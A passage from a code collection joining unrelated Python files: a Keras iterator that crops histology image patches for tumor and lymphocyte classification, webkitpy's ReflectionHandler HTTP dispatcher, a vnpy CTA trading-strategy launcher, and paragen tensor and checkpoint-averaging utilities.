img_original = load_img(fname,
grayscale=grayscale,
target_size=None)
mask_original = load_img(fmaskname,
grayscale=grayscale,
target_size=None)
# mask_verify = np.array(mask)
# mask_np = mask_verify[:, :, 0]
# Check the size of the image:
width = img_original.size[0]
height = img_original.size[1]
# if the image is larger than target size
if (width > target_size[0]) and (height > target_size[1]):
for i in range(10):
# 1. Get random coordinate
loc_x = width - target_size[0]
loc_y = height - target_size[1]
get_x = random.randint(0, loc_x - 1)
get_y = random.randint(0, loc_y - 1)
# 2. Crop the image
img = img_original.crop((get_x, get_y,
get_x + target_size[0],
get_y + target_size[1]))
x = img_to_array(img, dim_ordering=dim_ordering)
for (func, kwargs) in pipeline:
x = func(x, rng=rng, **kwargs)
# 2.5 Check the ratio of white pixels in the image
img_thresh = process_bgs(img=img_to_array(img, dim_ordering=dim_ordering))
total_pixel_m = float(img_thresh.shape[0] * img_thresh.shape[1])
nb_foreground = float(np.count_nonzero(img_thresh))
foreground_ratio = float(nb_foreground / total_pixel_m)
# 3. Crop the mask
get_mask = mask_original.crop((get_x, get_y,
get_x + target_size[0],
get_y + target_size[1]))
get_mask = img_to_array(get_mask, dim_ordering=dim_ordering)
# 4. Calculate mask label
total_pixel = float(get_mask.shape[0] * get_mask.shape[1])
lymphocyte_pixel = float(np.count_nonzero(get_mask[:, :, 0]))
lymphocyte_rate = float(lymphocyte_pixel / total_pixel)
if (lymphocyte_rate >= threshold) and (foreground_ratio >= threshold):
y = 0
return x, y
elif ((lymphocyte_rate < threshold) or (foreground_ratio < threshold)) and (i < (nb_crop-1)):
continue
elif ((lymphocyte_rate < threshold) or (foreground_ratio < threshold)) and (i == (nb_crop-1)):
y = 0
return x, y
# If the image is already smaller than target, there should be sth wrong
else:
print ("Error! Patch size smaller that target!")
# if fname.startswith('/disk1'):
# fname = '/mnt/data/jin_data/lymph_private/0124_finetune_processed/middle_patch/train/normal/' + os.path.basename(fname)
# img_original = load_img(fname,
# grayscale=grayscale,
# target_size=None)
# # The label for a normal patch must be zero
# y = 0
# # Check the size of the image:
# width = img_original.size[0]
# height = img_original.size[1]
# # If the image is larger than target, random crop
# if (width > target_size[0]) and (height > target_size[1]):
# for i in range(nb_crop):
# loc_x = width - target_size[0]
# loc_y = height - target_size[1]
# get_x = random.randint(0, loc_x - 1)
# get_y = random.randint(0, loc_y - 1)
# img = img_original.crop((get_x, get_y,
# get_x + target_size[0],
# get_y + target_size[1]))
# # Img to array and use the functions in pipeline for augmentation
# x = img_to_array(img, dim_ordering=dim_ordering)
# for (func, kwargs) in pipeline:
# x = func(x, rng=rng, **kwargs)
# # Check the ratio of white pixels in the image
# img_thresh = process_bgs(img=img_to_array(img, dim_ordering=dim_ordering))
# total_pixel_m = float(img_thresh.shape[0] * img_thresh.shape[1])
# nb_foreground = float(np.count_nonzero(img_thresh))
# foreground_ratio = float(nb_foreground / total_pixel_m)
# if (foreground_ratio >= threshold):
# return x, y
# elif (foreground_ratio < threshold) and (i < (nb_crop-1)):
# continue
# elif (foreground_ratio < threshold) and (i == (nb_crop-1)):
# return x, y
else:
print("Error! Patch size smaller than target!")
return x, y
class NumpyArrayIterator(Iterator):
def __init__(self, x, y, image_data_generator,
batch_size=32, shuffle=False, seed=None,
dim_ordering='default',
save_to_dir=None, save_prefix='', save_format='jpeg',
pool=None):
if y is not None and len(x) != len(y):
raise ValueError('X (images tensor) and y (labels) '
'should have the same length. '
'Found: X.shape = %s, y.shape = %s' %
(np.asarray(x).shape, np.asarray(y).shape))
if dim_ordering == 'default':
dim_ordering = K.image_dim_ordering()
self.x = np.asarray(x)
if self.x.ndim != 4:
raise ValueError('Input data in `NumpyArrayIterator` '
'should have rank 4. You passed an array '
'with shape', self.x.shape)
channels_axis = 3 if dim_ordering == 'tf' else 1
if self.x.shape[channels_axis] not in {1, 3, 4}:
raise ValueError('NumpyArrayIterator is set to use the '
'dimension ordering convention "' + dim_ordering + '" '
'(channels on axis ' + str(channels_axis) + '), i.e. expected '
'either 1, 3 or 4 channels on axis ' + str(channels_axis) + '. '
'However, it was passed an array with shape ' + str(self.x.shape) +
' (' + str(self.x.shape[channels_axis]) + ' channels).')
if y is not None:
self.y = np.asarray(y)
else:
self.y = None
self.image_data_generator = image_data_generator
self.dim_ordering = dim_ordering
self.save_to_dir = save_to_dir
self.save_prefix = save_prefix
self.save_format = save_format
self.pool = pool
super(NumpyArrayIterator, self).__init__(x.shape[0], batch_size, shuffle, seed)
def next(self):
# for python 2.x.
# Keeps under lock only the mechanism which advances
# the indexing of each batch
# see http://anandology.com/blog/using-iterators-and-generators/
with self.lock:
index_array, current_index, current_batch_size = next(self.index_generator)
# The transformation of images is not under thread lock
# so it can be done in parallel
batch_x = None
if self.pool:
pipeline = self.image_data_generator.pipeline()
result = self.pool.map(process_image_pipeline, (
(pipeline, self.x[j], self.rngs[i%self.batch_size])
for i, j in enumerate(index_array)))
batch_x = np.array(result)
else:
batch_x = np.zeros(tuple([current_batch_size] + list(self.x.shape)[1:]))
for i, j in enumerate(index_array):
x = self.x[j]
x = self.image_data_generator.random_transform(x.astype('float32'))
x = self.image_data_generator.standardize(x)
batch_x[i] = x
if self.save_to_dir:
for i in range(current_batch_size):
img = array_to_img(batch_x[i], self.dim_ordering, scale=True)
fname = '{prefix}_{index}_{hash}.{format}'.format(prefix=self.save_prefix,
index=current_index + i,
hash=np.random.randint(1e4),
format=self.save_format)
img.save(os.path.join(self.save_to_dir, fname))
if self.y is None:
return batch_x
batch_y = self.y[index_array]
return batch_x, batch_y
class DirectoryIterator(Iterator):
def __init__(self, directory, image_data_generator,
target_size=(256, 256), color_mode='rgb',
dim_ordering='default',
classes=None, class_mode='categorical',
batch_size=32, shuffle=True, seed=None,
save_to_dir=None, save_prefix='', save_format='jpeg',
follow_links=False, pool=None, save_list_dir=None,
nb_gpu=4, phase="train"):
if dim_ordering == 'default':
dim_ordering = K.image_dim_ordering()
self.directory = directory
self.image_data_generator = image_data_generator
self.target_size = tuple(target_size)
if color_mode not in {'rgb', 'grayscale'}:
raise ValueError('Invalid color mode:', color_mode,
'; expected "rgb" or "grayscale".')
self.color_mode = color_mode
self.dim_ordering = dim_ordering
if self.color_mode == 'rgb':
if self.dim_ordering == 'tf':
self.image_shape = self.target_size + (3,)
else:
self.image_shape = (3,) + self.target_size
else:
if self.dim_ordering == 'tf':
self.image_shape = self.target_size + (1,)
else:
self.image_shape = (1,) + self.target_size
self.classes = classes
if class_mode not in {'categorical', 'binary', 'sparse', None}:
raise ValueError('Invalid class_mode:', class_mode,
'; expected one of "categorical", '
'"binary", "sparse", or None.')
self.class_mode = class_mode
self.save_to_dir = save_to_dir
self.save_prefix = save_prefix
self.save_format = save_format
self.pool = pool
self.batch_size = batch_size
self.nb_gpu = nb_gpu
self.save_list_dir = save_list_dir
self.phase = phase
white_list_formats = {'png', 'jpg', 'jpeg', 'bmp'}
# first, count the number of samples and classes
# self.nb_sample = 0
self.nb_sample_init = 0
if not classes:
classes = []
for subdir in sorted(os.listdir(directory)):
if os.path.isdir(os.path.join(directory, subdir)):
classes.append(subdir)
self.nb_class = len(classes)
self.class_indices = dict(zip(classes, range(len(classes))))
def _recursive_list(subpath):
return sorted(os.walk(subpath, followlinks=follow_links), key=lambda tpl: tpl[0])
for subdir in classes:
subpath = os.path.join(directory, subdir)
for root, _, files in _recursive_list(subpath):
for fname in files:
is_valid = False
for extension in white_list_formats:
if fname.lower().endswith('.' + extension):
is_valid = True
break
if is_valid:
self.nb_sample_init += 1
print ("Using this processing code...")
print('Found %d images belonging to %d classes.' % (self.nb_sample_init, self.nb_class))
# second, build an index of the images in the different class subfolders
self.filenames = []
self.classes = np.zeros((self.nb_sample_init,), dtype='int32')
i = 0
for subdir in classes:
subpath = os.path.join(directory, subdir)
for root, _, files in _recursive_list(subpath):
for fname in files:
is_valid = False
for extension in white_list_formats:
if fname.lower().endswith('.' + extension):
is_valid = True
break
if is_valid:
self.classes[i] = self.class_indices[subdir]
i += 1
# add filename relative to directory
absolute_path = os.path.join(root, fname)
self.filenames.append(os.path.relpath(absolute_path, directory))
# Save the list of img_paths when doing the test
print("Current phase:")
print(self.phase)
if self.phase == "test":
files_np = np.array(self.filenames)
np.save(self.save_list_dir, files_np)
print("Image paths list saved for testing!")
# Pop the remainder according to the nb_gpu
multiple = self.nb_gpu * self.batch_size
print("The multiple is: %d" % multiple)
quotient = self.nb_sample_init // multiple
print("Quotient: %d" % quotient)
nb_excess_patch = self.nb_sample_init - quotient * multiple
print("Excess patches: %d" % nb_excess_patch)
self.nb_sample = self.nb_sample_init - nb_excess_patch
# Deal with excess patches
if nb_excess_patch == 0:
print("There is no excessing patches.")
else:
for i in range(nb_excess_patch):
np.delete(self.classes, -1)
self.filenames.pop(-1)
# print("Lenth of the patch meta: %d" % len(self.patch_meta))
print("[!] After pop the total number of patches is %d" % self.nb_sample)
super(DirectoryIterator, self).__init__(self.nb_sample, batch_size, shuffle, seed)
def next(self):
with self.lock:
index_array, current_index, current_batch_size = next(self.index_generator)
# The transformation of images is not under thread lock
# so it can be done in parallel
batch_x = None
grayscale = self.color_mode == 'grayscale'
if self.pool:
pipeline = self.image_data_generator.pipeline()
result = self.pool.map(process_image_pipeline_dir, ((pipeline,
self.filenames[j],
self.directory,
grayscale,
self.target_size,
self.dim_ordering,
self.rngs[i%self.batch_size]) for i, j in enumerate(index_array)))
batch_x = np.array(result)
else:
batch_x = np.zeros((current_batch_size,) + self.image_shape)
# build batch of image data
for i, j in enumerate(index_array):
fname = self.filenames[j]
img = load_img(os.path.join(self.directory, fname),
grayscale=grayscale,
target_size=self.target_size)
x = img_to_array(img, dim_ordering=self.dim_ordering)
x = self.image_data_generator.random_transform(x)
x = self.image_data_generator.standardize(x)
batch_x[i] = x
# optionally save augmented images to disk for debugging purposes
# if self.save_to_dir:
# for i in range(current_batch_size):
# img = array_to_img(batch_x[i], self.dim_ordering, scale=True)
# fname = '{prefix}_{index}_{hash}.{format}'.format(prefix=self.save_prefix,
# index=current_index + i,
# hash=np.random.randint(1e4),
# format=self.save_format)
# img.save(os.path.join(self.save_to_dir, fname))
# build batch of labels
if self.class_mode == 'sparse':
batch_y = self.classes[index_array]
elif self.class_mode == 'binary':
batch_y = self.classes[index_array].astype('float32')
elif self.class_mode == 'categorical':
batch_y = np.zeros((len(batch_x), self.nb_class), dtype='float32')
for i, label in enumerate(self.classes[index_array]):
batch_y[i, label] = 1.
else:
return batch_x
return batch_x, batch_y
##############################
# TODO: follow the implementation of DirectoryIterator
##############################
class JsonIterator(Iterator,RandomCrop):
def __init__(self, json_file_path, image_data_generator,
target_size=(256, 256), color_mode='rgb',
dim_ordering='default',
classes=None, class_mode='categorical',
batch_size=32, shuffle=True, seed=None,
save_to_dir=None, save_prefix='', save_format='jpeg',
follow_links=False, pool=None, nb_gpu=4, is_training=True):
if dim_ordering == 'default':
dim_ordering = K.image_dim_ordering()
self.json_file_path = json_file_path
self.image_data_generator = image_data_generator
self.target_size = tuple(target_size)
if color_mode not in {'rgb', 'grayscale'}:
raise ValueError('Invalid color mode:', color_mode,
'; expected "rgb" or "grayscale".')
self.color_mode = color_mode
self.dim_ordering = dim_ordering
if self.color_mode == 'rgb':
if self.dim_ordering == 'tf':
self.image_shape = self.target_size + (3,)
else:
self.image_shape = (3,) + self.target_size
else:
if self.dim_ordering == 'tf':
self.image_shape = self.target_size + (1,)
else:
self.image_shape = (1,) + self.target_size
self.classes = classes
if class_mode not in {'categorical', 'binary', 'sparse', None}:
raise ValueError('Invalid class_mode:', class_mode,
'; expected one of "categorical", '
'"binary", "sparse", or None.')
self.class_mode = class_mode
self.save_to_dir = save_to_dir
self.save_prefix = save_prefix
self.save_format = save_format
self.pool = pool
self.batch_size = batch_size
self.nb_gpu = nb_gpu
# TODO: load pre-processed patches into patch_meta (Finished)
# self.total = []
# self.patch_meta_tumor = []
# self.patch_meta_normal_mucosa=[]
global logger
logger = logging.getLogger(__name__)
enum = threading.enumerate()
logger.info('============before, num of threads is:===========')
logger.info(len(enum))
# set parameters
# labels = ['normal_hard_black', 'normal_hard_dim', 'normal_hard3', 'normal_hard2', 'normal_hard', 'normal', 'tumor_hard', 'tumor']
labels = ['normal', 'tumor']
json_file_path=self.json_file_path
# nb_per_class = [1, 1, 6, 10, 15, 15, 16, 32]
# foreground_rate_per_class = [0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.7, 0.7]
nb_per_class = [16, 16]
foreground_rate_per_class = [0.1, 0.7]
# pdb.set_trace()
objs, nb_samples_per_epoch = Iterator.get_instance_objects(train_base_path=json_file_path,
eval_base_path=json_file_path,
labels=labels,
nb_per_class=nb_per_class,
foreground_rate_per_class=foreground_rate_per_class,
is_training=is_training,
is_shuffle=True,
crop_width=224,
crop_height=224,
readers=1,
num_threads=32,
info_maxsize=10,
data_maxsize=10)
logger.info('*********nb_samples_per_epoch: {}**********' .format(nb_samples_per_epoch))
print('*********nb_samples_per_epoch: {}**********' .format(nb_samples_per_epoch))
self.batch_generator = Iterator.image_data_generator(objs, sum(nb_per_class))
enum = threading.enumerate()
logger.info('============before, num of threads is:===========')
logger.info(len(enum))
self.stop_training = False
if self.stop_training == True:
end_subthreads(objs)
# count the numbers of threads after task is done
enum = threading.enumerate()
print("done")
super(JsonIterator, self).__init__(batch_size, shuffle, seed)
#TODO: use this function to generate batch of image data: batch_x and label: batch_y
def next(self):
grayscale = self.color_mode == 'grayscale'
# a=time.time()
batch_generator = next(self.batch_generator)
random.shuffle(batch_generator)
#TODO: implement process_image_pipeline_json, this function takes input of filenames
if self.pool:
pipeline = self.image_data_generator.pipeline()
# map function: use the "process_image_pipeline_json" function to process the second term
results = self.pool.map(process_image_pipeline_img,
((pipeline,
image_labels, # change 成index_array_neg(j)
grayscale,
self.target_size,
self.dim_ordering,
self.rngs[index%(self.batch_size)]) for index, image_labels in enumerate(batch_generator)))
results_normal_np = np.asarray(results)
nb_sample = results_normal_np.shape[0]
#TODO: get the X and Y from results ()
batch_x = np.asarray(results_normal_np[:, 0])
batch_y = np.asarray(results_normal_np[:, 1])
new_batch_x = []
new_batch_y = []
for i in range (nb_sample):
new_batch_x.append(batch_x[i])
new_batch_y.append(batch_y[i])
new_batch_x = np.array(new_batch_x) #(224,224,3)*56
new_batch_y = np.array(new_batch_y)
new_batch_y = np.reshape(new_batch_y, (nb_sample, 1))
# new_batch_y = keras.utils.to_categorical(new_batch_y,2)
# print(new_batch_y)
# print (new_batch_x.shape)
# print (new_batch_y.shape)
# print ("Value of y: ")
# print (batch_y)
else:
print ("#######This is the else ...######")
print ("#######Need to debug!!###########")
# optionally save augmented images to disk for debugging purposes
"""
if self.save_to_dir:
for i in range(current_batch_size):
img = array_to_img(batch_x[i], self.dim_ordering, scale=True)
fname = '{prefix}_{index}_{hash}.{format}'.format(prefix=self.save_prefix,
index=current_index + i,
hash=np.random.randint(1e4),
format=self.save_format)
img.save(os.path.join(self.save_to_dir, fname))
"""
# build batch of labels
"""
if self.class_mode == 'sparse':
new_batch_y = self.classes[index_array]
elif self.class_mode == 'binary':
new_batch_y = self.classes[index_array].astype('float32')
elif self.class_mode == 'categorical':
new_batch_y = np.zeros((len(batch_x), self.nb_class), dtype='float32')
for i, label in enumerate(self.classes[index_array]):
new_batch_y[i, label] = 1.
"""
return new_batch_x, new_batch_y
|
reflectionhandler.py
|
# Copyright (c) 2011 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from __future__ import with_statement
try:
import json
except ImportError:
# python 2.5 compatibility
import webkitpy.thirdparty.simplejson as json
import BaseHTTPServer
import cgi
import codecs
import datetime
import fnmatch
import mimetypes
import os
import os.path
import shutil
import threading
import time
import urlparse
import wsgiref.handlers
import BaseHTTPServer
class ReflectionHandler(BaseHTTPServer.BaseHTTPRequestHandler):
# Subclasses should override.
STATIC_FILE_NAMES = None
STATIC_FILE_DIRECTORY = None
# Setting this flag to True causes the server to send
# Access-Control-Allow-Origin: *
# with every response.
allow_cross_origin_requests = False
def do_GET(self):
self._handle_request()
def do_POST(self):
self._handle_request()
def _read_entity_body(self):
length = int(self.headers.getheader('content-length'))
return self.rfile.read(length)
def _read_entity_body_as_json(self):
return json.loads(self._read_entity_body())
def _handle_request(self):
if "?" in self.path:
path, query_string = self.path.split("?", 1)
self.query = cgi.parse_qs(query_string)
else:
path = self.path
self.query = {}
function_or_file_name = path[1:] or "index.html"
if function_or_file_name in self.STATIC_FILE_NAMES:
self._serve_static_file(function_or_file_name)
return
function_name = function_or_file_name.replace(".", "_")
if not hasattr(self, function_name):
self.send_error(404, "Unknown function %s" % function_name)
return
if function_name[0] == "_":
self.send_error(401, "Not allowed to invoke private or protected methods")
return
function = getattr(self, function_name)
function()
def _serve_static_file(self, static_path):
self._serve_file(os.path.join(self.STATIC_FILE_DIRECTORY, static_path))
def quitquitquit(self):
self._serve_text("Server quit.\n")
# Shutdown has to happen on another thread from the server's thread,
# otherwise there's a deadlock
threading.Thread(target=lambda: self.server.shutdown()).start()
def _send_access_control_header(self):
if self.allow_cross_origin_requests:
self.send_header('Access-Control-Allow-Origin', '*')
def _serve_text(self, text):
self.send_response(200)
self._send_access_control_header()
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(text)
def _serve_json(self, json_object):
self.send_response(200)
self._send_access_control_header()
self.send_header('Content-type', 'application/json')
self.end_headers()
json.dump(json_object, self.wfile)
def _serve_file(self, file_path, cacheable_seconds=0):
if not os.path.exists(file_path):
self.send_error(404, "File not found")
return
with codecs.open(file_path, "rb") as static_file:
self.send_response(200)
self._send_access_control_header()
self.send_header("Content-Length", os.path.getsize(file_path))
mime_type, encoding = mimetypes.guess_type(file_path)
if mime_type:
self.send_header("Content-type", mime_type)
if cacheable_seconds:
expires_time = (datetime.datetime.now() +
datetime.timedelta(0, cacheable_seconds))
expires_formatted = wsgiref.handlers.format_date_time(
time.mktime(expires_time.timetuple()))
self.send_header("Expires", expires_formatted)
self.end_headers()
shutil.copyfileobj(static_file, self.wfile)
|
runCtaTrading.py
|
# encoding: UTF-8
import multiprocessing
from time import sleep
from datetime import datetime, time
from vnpy.event import EventEngine2
from vnpy.trader.vtEvent import EVENT_LOG, EVENT_ERROR
from vnpy.trader.vtEngine import MainEngine, LogEngine
from vnpy.trader.gateway import futuGateway
from vnpy.trader.app import ctaStrategy
from vnpy.trader.app.ctaStrategy.ctaBase import EVENT_CTA_LOG
#----------------------------------------------------------------------
def runChildProcess():
"""子进程运行函数"""
print('-'*20)
# 创建日志引擎
le = LogEngine()
le.setLogLevel(le.LEVEL_INFO)
le.addConsoleHandler()
le.addFileHandler()
le.info(u'启动CTA策略运行子进程')
ee = EventEngine2()
le.info(u'事件引擎创建成功')
me = MainEngine(ee)
me.addGateway(futuGateway)
me.addApp(ctaStrategy)
le.info(u'主引擎创建成功')
def process_error(event):
error = event.dict_['data']
le.error(error.errorMsg)
ee.register(EVENT_LOG, le.processLogEvent)
ee.register(EVENT_ERROR, process_error)
ee.register(EVENT_CTA_LOG, le.processLogEvent)
le.info(u'注册日志事件监听')
me.connect('FUTU')
le.info(u'连接CTP接口')
sleep(5) # 等待CTP接口初始化
cta = me.getApp(ctaStrategy.appName)
cta.loadSetting()
le.info(u'CTA策略载入成功')
cta.initAll()
le.info(u'CTA策略初始化成功')
cta.startAll()
le.info(u'CTA策略启动成功')
while True:
sleep(1)
#----------------------------------------------------------------------
def runParentProcess():
"""父进程运行函数"""
# 创建日志引擎
le = LogEngine()
le.setLogLevel(le.LEVEL_INFO)
le.addConsoleHandler()
le.info(u'启动CTA策略守护父进程')
DAY_START = time(8, 45) # 日盘启动和停止时间
DAY_END = time(15, 30)
NIGHT_START = time(20, 45) # 夜盘启动和停止时间
NIGHT_END = time(2, 45)
p = None # 子进程句柄
while True:
currentTime = datetime.now().time()
recording = False
# 判断当前处于的时间段
if ((currentTime >= DAY_START and currentTime <= DAY_END) or
(currentTime >= NIGHT_START) or
(currentTime <= NIGHT_END)):
recording = True
# 记录时间则需要启动子进程
if recording and p is None:
le.info(u'启动子进程')
p = multiprocessing.Process(target=runChildProcess)
p.start()
le.info(u'子进程启动成功')
# 非记录时间则退出子进程
if not recording and p is not None:
le.info(u'关闭子进程')
p.terminate()
p.join()
p = None
le.info(u'子进程关闭成功')
sleep(5)
if __name__ == '__main__':
runChildProcess()
# 尽管同样实现了无人值守,但强烈建议每天启动时人工检查,为自己的PNL负责
#runParentProcess()
|
tensor.py
|
import os.path
from collections import OrderedDict
from contextlib import contextmanager
from typing import Dict, List, Tuple
import subprocess
import time
import numpy as np
import logging
logger = logging.getLogger(__name__)
from torch import Tensor
from torch.cuda.amp import GradScaler, autocast
from torch.multiprocessing import Process
import torch
from paragen.utils.io import TEMP_IO_SAVE_PATH, wait_until_exist
from paragen.utils.ops import recursive
from paragen.utils.runtime import Environment, singleton
def list2tensor(x):
if isinstance(x, Dict):
return {k: list2tensor(v) for k, v in x.items()}
elif isinstance(x, List):
_x = get_example_obj(x)
return create_tensor(x, type(_x))
else:
return x
def convert_idx_to_tensor(idx, pad, ndim=None):
"""
Convert a nd list of indices to a torch tensor
Args:
idx: a nd list of indices
pad: padding index
ndim: dimension for idx
Returns:
- indices in torch tensor
"""
max_lengths = maxlen(idx, ndim=ndim)
tensor_type = type(pad)
ndim = len(max_lengths)
idx = pad_idx(idx, max_lengths, pad, ndim=ndim)
idx = create_tensor(idx, tensor_type)
return idx
def maxlen(idx, ndim=None):
"""
Compute maxlen tuple from index
Args:
idx: a nd list of indices
ndim: ndim for idx
Returns:
- tensor shape (tuple) of index list
"""
def _max_tuple(tuples: List[Tuple]):
return tuple(max(sizes) for sizes in zip(*tuples))
if ndim is None:
if isinstance(idx, list):
tuples = [maxlen(i) for i in idx]
return (len(idx),) + _max_tuple(tuples)
else:
return tuple()
else:
if ndim > 1:
tuples = [maxlen(i, ndim-1) for i in idx]
return (len(idx),) + _max_tuple(tuples)
else:
return len(idx),
def pad_idx(idx, max_lengths, pad_id, ndim):
"""
Complete index list to a certain shape with padding
Args:
idx: a nd list of indices
max_lengths: n-size tuple defining shape
pad_id: padding index
ndim: dimension for idx
Returns:
- a nd list of indices with padding
"""
if ndim > 1:
l, suff = max_lengths[0], max_lengths[1:]
content = [pad_idx(i, suff, pad_id, ndim-1) for i in idx]
if len(idx) < l:
pad = create_pad((l - len(idx),) + suff, pad_id)
content += pad
return content
else:
return idx + [pad_id for _ in range(max_lengths[0] - len(idx))]
def create_pad(size, pad_id):
"""
Create a padding list of a given size
Args:
size: nd list shape
pad_id: padding index
Returns:
- padding list of the given size
"""
if len(size) == 1:
return [pad_id for _ in range(size[0])]
else:
return [create_pad(size[1:], pad_id) for _ in range(size[0])]
def create_tensor(idx: List, tensor_type) -> Tensor:
"""
Create torch tensor from index
Args:
idx: index list
tensor_type: type of tensor
Returns:
- a torch tensor created from index
"""
if tensor_type is int:
T = torch.LongTensor(idx)
elif tensor_type is float:
T = torch.FloatTensor(idx)
elif tensor_type is bool:
T = torch.BoolTensor(idx)
else:
raise TypeError
return T
def convert_tensor_to_idx(tensor: Tensor, bos: int = None, eos: int = None, pad: int = None):
"""
Convert a tensor to index.
Args:
tensor: original tensor
bos: begin-of-sequence index
eos: end-of-sequence index
pad: padding index
Returns:
- a nd list of indices
"""
idx = tensor.tolist()
if bos and eos and pad:
idx = remove_special_tokens(idx, bos, eos, pad)
return idx
def remove_special_tokens(idx, bos: int, eos: int, pad: int):
"""
Remove special tokens from nd index list
Args:
idx: a nd index list
bos: begin-of-sequence index
eos: end-of-sequence index
pad: padding index
Returns:
- index list without special tokens
"""
if isinstance(idx, list) and isinstance(idx[0], int):
if idx[0] == bos:
idx = idx[1:]
eos_pos = find_eos(idx, eos)
if eos_pos is not None:
idx = idx[:eos_pos]
idx = [i for i in idx if i != pad]
return idx
else:
return [remove_special_tokens(i, bos, eos, pad) for i in idx]
def find_eos(idx: list, eos: int):
"""
Find eos position
Args:
idx: index list
eos: end-of-sequence index
Returns:
- position of eos
"""
for pos, i in enumerate(idx):
if i == eos:
return pos
return None
def _to_device(tensor, device, fp16=False):
"""
Move a tensor to device
Args:
tensor: original tensor
device: device name
fp16: whether to perform fp16
Returns:
- tensor on the given device
"""
if isinstance(tensor, torch.Tensor):
if device.startswith('cuda'):
tensor = tensor.cuda()
if isinstance(tensor, torch.FloatTensor) and fp16:
tensor = tensor.half()
elif device == 'cpu':
tensor = tensor.cpu()
return tensor
def half_samples(samples):
"""
Half tensor of the given samples
Args:
samples: samples to half
Returns:
- halved samples
"""
if isinstance(samples, List):
halved = []
is_dummy = False
for s in samples:
hs, dummy = half_samples(s)
is_dummy = dummy or is_dummy
halved.append(hs)
return halved, is_dummy
elif isinstance(samples, Dict):
t = get_example_obj(samples)
size = t.size(0)
idx = np.random.choice(list(range(size)), size // 2, replace=False)
if len(idx) > 0:
index = recursive(index_tensor)
return index(samples, idx), False
else:
dummy = recursive(dummy_tensor)
return dummy(samples), True
else:
raise NotImplementedError
def index_tensor(tensor, idx):
"""
select tensor with the row of given indices
Args:
tensor: original
idx: index to keep
Returns:
- tensor with selected row
"""
return tensor[idx]
def dummy_tensor(tensor):
size = tensor.size()
new_size = tuple([1 for _ in size[1:]])
tot = 1
for s in size:
tot *= s
tensor = tensor.view((tot, ) + new_size)
tensor = tensor[:1]
return tensor
def get_example_obj(x):
"""
Get a example object from List, Tuple or Dict
Args:
x: given object
Returns:
- an example object
"""
if isinstance(x, List) or isinstance(x, Tuple):
return get_example_obj(x[0])
elif isinstance(x, Dict):
for v in x.values():
return get_example_obj(v)
else:
return x
@contextmanager
def possible_autocast():
"""
Possibly perform autocast
"""
env = Environment()
if env.fp16:
with autocast():
yield
else:
yield
@singleton
class GradScalerSingleton:
"""
GradScaler for fp16 training
"""
def __init__(self) -> None:
self._grad_scaler = GradScaler()
def scale_loss(self, loss):
return self._grad_scaler.scale(loss)
def step(self, optimizer):
self._grad_scaler.step(optimizer)
def update(self):
self._grad_scaler.update()
def possible_scale_loss(loss):
"""
Possibly scale loss in fp training
"""
env = Environment()
if env.fp16:
grad_scaler = GradScalerSingleton()
return grad_scaler.scale_loss(loss)
else:
return loss
def save_avg_ckpt(last_ckpts, save_path, timeout=10000, wait=False):
def _save(ckpts, path, timeout=10000):
for ckpt in ckpts:
if not wait_until_exist(ckpt, timeout=timeout):
logger.info(f'timeout: {ckpt} not found')
return
time.sleep(10)
avg_state_dict = get_avg_ckpt(ckpts)
save_ckpt(avg_state_dict, path, wait=True)
if wait:
_save(last_ckpts, save_path, timeout)
else:
Process(target=_save, args=(last_ckpts, save_path, timeout)).start()
def save_ckpt(state_dict, path, retry=5, wait=False):
def _save(state_dict, path):
for _ in range(retry):
try:
tmp_path = os.path.join(TEMP_IO_SAVE_PATH, f"tmp.put.{path.split('/')[-1]}")
with open(tmp_path, 'wb') as fout:
torch.save(state_dict, fout)
if path.startswith('hdfs:'):
subprocess.run(["hadoop", "fs", "-put", "-f", tmp_path, path],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
subprocess.run(['rm', tmp_path], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
else:
subprocess.run(["mv", tmp_path, path],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
logger.info(f'successfully save state_dict to {path}')
break
except Exception as e:
logger.warning(f'saving checkpoint {path} fails: {e}')
state_dict = to_device(state_dict, 'cpu')
if wait:
_save(state_dict, path)
else:
Process(target=_save, args=(state_dict, path)).start()
def get_avg_ckpt(ckpt_paths, device='cpu'):
state_dict_list = []
for path in ckpt_paths:
if path.startswith('hdfs:'):
local_path = os.path.join(TEMP_IO_SAVE_PATH, f'tmp.get.{path.split("/")[-1]}')
subprocess.run(['hadoop', 'fs', '-get', path, local_path])
with open(local_path, 'rb') as fin:
state_dict_list.append(torch.load(fin, map_location='cpu')['model'])
subprocess.run(['rm', local_path])
else:
with open(path, 'rb') as fin:
state_dict_list.append(torch.load(fin, map_location='cpu')['model'])
state_dict = average_checkpoints(state_dict_list)
if device != 'cpu':
state_dict = {k: v.to(device) for k, v in state_dict.items()}
return {"model": state_dict}
def average_checkpoints(state_dict_list: List):
state_dict = OrderedDict()
for i, sd in enumerate(state_dict_list):
for key in sd:
p = sd[key]
if isinstance(p, torch.HalfTensor):
